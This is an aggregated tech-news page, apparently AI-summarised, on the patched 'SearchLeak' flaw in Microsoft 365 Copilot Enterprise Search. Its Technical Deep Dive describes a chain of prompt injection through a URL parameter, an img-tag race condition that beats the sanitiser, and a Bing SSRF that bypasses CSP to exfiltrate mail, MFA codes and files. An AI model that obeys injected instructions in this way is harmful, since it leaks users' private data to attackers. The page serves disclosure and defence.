๐The Next Web (TNW)โขRecentcollected in 60m
SearchLeak vulnerability exposes Microsoft 365 Copilot data
๐กCritical security flaw in Microsoft 365 Copilot allows data theft via a single link. Essential for enterprise security.
โก 30-Second TL;DR
What Changed
Vulnerability chain identified in Microsoft 365 Copilot Enterprise Search
Why It Matters
This vulnerability highlights the critical need for robust data access controls within enterprise AI agents. Organizations must audit their Copilot search permissions to prevent unauthorized data exposure.
What To Do Next
Audit your Microsoft 365 Copilot search permissions and restrict access to sensitive data sources immediately.
Who should care:Enterprise & Security Teams
๐ง Deep Insight
Web-grounded analysis with 12 cited sources.
๐ Enhanced Key Takeaways
- โขThe 'SearchLeak' vulnerability, assigned CVE-2026-42824 with a critical severity rating by Microsoft, is a three-stage attack chain combining a Parameter-to-Prompt (P2P) Injection, an HTML Rendering Race Condition, and a Content Security Policy (CSP) Bypass via Bing Server-Side Request Forgery (SSRF).
- โขThe exploit allowed attackers to silently exfiltrate sensitive data such as MFA codes, email messages, calendar details, and private organizational files from a victim's mailbox, calendar, SharePoint, and OneDrive accounts.
- โขMicrosoft has already remediated the 'SearchLeak' vulnerability on its backend, meaning no user action is required to mitigate this specific threat.
- โขThe vulnerability leveraged a relatively new class of AI-specific weakness (Parameter-to-Prompt Injection) in conjunction with classic web security bugs, highlighting how AI systems can create new pathways to exploit older vulnerabilities in impactful ways.
- โขTraditional anti-phishing filters and URL filtering tools were unlikely to detect the malicious link because it pointed to a legitimate microsoft.com domain, making the attack highly stealthy.
๐ Competitor Analysisโธ Show
Microsoft 365 Copilot Competitor Analysis
| Feature/Aspect | Microsoft 365 Copilot | OpenAI ChatGPT Enterprise / Teams | Anthropic Claude for Enterprise | Google Gemini for Workspace | GoSearch | Glean | Coworker AI |
|---|---|---|---|---|---|---|---|
| Primary Focus | AI assistant embedded across Microsoft 365 suite | B2B conversational AI with enhanced security | Leading competitor to OpenAI, strong Amazon backing | Multimodal AI with native Google Workspace integration | Agentic Enterprise AI Search across entire tech stack | Enterprise search platform across internal systems | AI that both searches and executes actions across mixed stacks |
| Data Integration | Microsoft Graph (M365 data: Word, Excel, Outlook, Teams, SharePoint, OneDrive) | Enterprise data (specifics depend on integration) | Enterprise data (specifics depend on integration) | Google Workspace data | 100+ integrations (Slack, Jira, Confluence, Salesforce, etc.) | 100+ integrations (Slack, Box, Google Drive, OneDrive, SharePoint, etc.) | 40+ native integrations (Salesforce, Slack, Jira, Google Drive, etc.) |
| Security Posture | Enterprise-grade data privacy and security, honors existing M365 controls | Enhanced security, collaboration, user management | Strong security, guardrails | Enterprise-grade data privacy and security | Hybrid federated and indexed architecture, permission-aware answers | Robust compliance and end-to-end data security, guardrails | Enterprise-grade security |
| Key Capabilities | Document drafting, data analysis, email summarization, team communication, unified search | Conversational AI, team workflows, browser tasks | Autonomous multi-step tasks on local files/apps | Deep Research, real-time web access | Unified AI search and action, knowledge centralization | Powerful search, generative AI features, cites sources | Cross-tool search and execution (e.g., update CRM, create Jira tickets) |
| Pricing (per user/month) | Bundles start at $22 (promotional), add-on for existing M365 subscribers | Not specified, B2B version | Not specified, B2B version | Gemini Advanced: $20 | Custom enterprise pricing (typically $10-15) | Custom enterprise pricing (typically $10-15) | $30 (no M365 license required) |
| Limitations | Primarily limited to Microsoft 365 ecosystem; challenges with mixed tech stacks | Search-only for some aspects (e.g., Glean) | Search-only, not for market/investment research |
๐ ๏ธ Technical Deep Dive
- Parameter-to-Prompt (P2P) Injection: The vulnerability chain began by exploiting how Microsoft 365 Copilot Enterprise Search processes the 'q' URL parameter. Instead of treating the content of this parameter solely as a search query, Copilot interpreted it as executable instructions, allowing an attacker to inject malicious prompts.
- HTML Rendering Race Condition: The second stage involved a timing vulnerability. When Copilot streamed its output, an injected
<img>tag within the AI's response would fire its request to an external server before the output sanitizer could wrap the raw HTML in<code>blocks, which would neutralize it. This allowed the image request, containing exfiltrated data, to be sent before being blocked. - CSP Bypass via Bing SSRF: The final stage exploited Bing's image-search endpoint, which was allowlisted in the Content Security Policy (CSP). This endpoint performed a server-side fetch to an attacker-controlled URL. The
<img>tag, triggered by the race condition, directed Bing to fetch the attacker's URL, which included the stolen data, effectively bypassing the page's CSP and exfiltrating the information.
๐ฎ Future ImplicationsAI analysis grounded in cited sources
AI-specific vulnerabilities will increasingly combine with traditional web flaws.
The 'SearchLeak' vulnerability demonstrates a growing trend where novel AI-specific weaknesses, like prompt injection, are chained with older, well-understood web security bugs (e.g., race conditions, SSRF) to create potent new attack vectors.
Traditional security tools will struggle to detect sophisticated AI-driven exploits.
Because the malicious link in 'SearchLeak' originated from a legitimate microsoft.com domain, conventional anti-phishing and URL filtering solutions were ineffective, necessitating new detection methods for AI-powered platforms.
Continuous security auditing and 'red-teaming' of AI systems will become critical.
The discovery of 'SearchLeak' and previous vulnerabilities like 'Reprompt' and 'EchoLeak' underscore the need for ongoing, specialized security research to identify and mitigate complex, chained vulnerabilities in AI assistants and enterprise search tools.
โณ Timeline
2025-03
Microsoft 365 Copilot generally available for enterprise customers
2025-05
Aim Security discloses 'EchoLeak' (CVE-2025-32711), a zero-click Copilot data-leak bug
2025-12
Varonis Threat Labs discovers 'Reprompt' vulnerability in Copilot Personal
2026-05
Microsoft applies server-side fixes for the 'SearchLeak' vulnerability (CVE-2026-42824)
2026-06
Varonis Threat Labs publicly discloses 'SearchLeak' vulnerability in Microsoft 365 Copilot Enterprise Search
๐ Sources (12)
Factual claims are grounded in the sources below. Forward-looking analysis is AI-generated interpretation.
๐ฐ
Weekly AI Recap
Read this week's curated digest of top AI events โ
๐Related Updates
Same topic
Explore #cybersecurity
Same product
More on microsoft-365-copilot
Same source
Latest from The Next Web (TNW)
Microsoft Challenges Multi-Vendor Email Security Strategy
ComputerworldโขJun 17
๐
HSBC Partners with Google Cloud to Scale AI Operations
Bloomberg TechnologyโขJun 17
Neuron Soundware launches โฌ150 AI drone detection system
The Next Web (TNW)โขJun 16
ALS patient uses brain implant to speak with 99% accuracy
The Next Web (TNW)โขJun 16
AI-curated news aggregator. All content rights belong to original publishers.
Original source: The Next Web (TNW) โ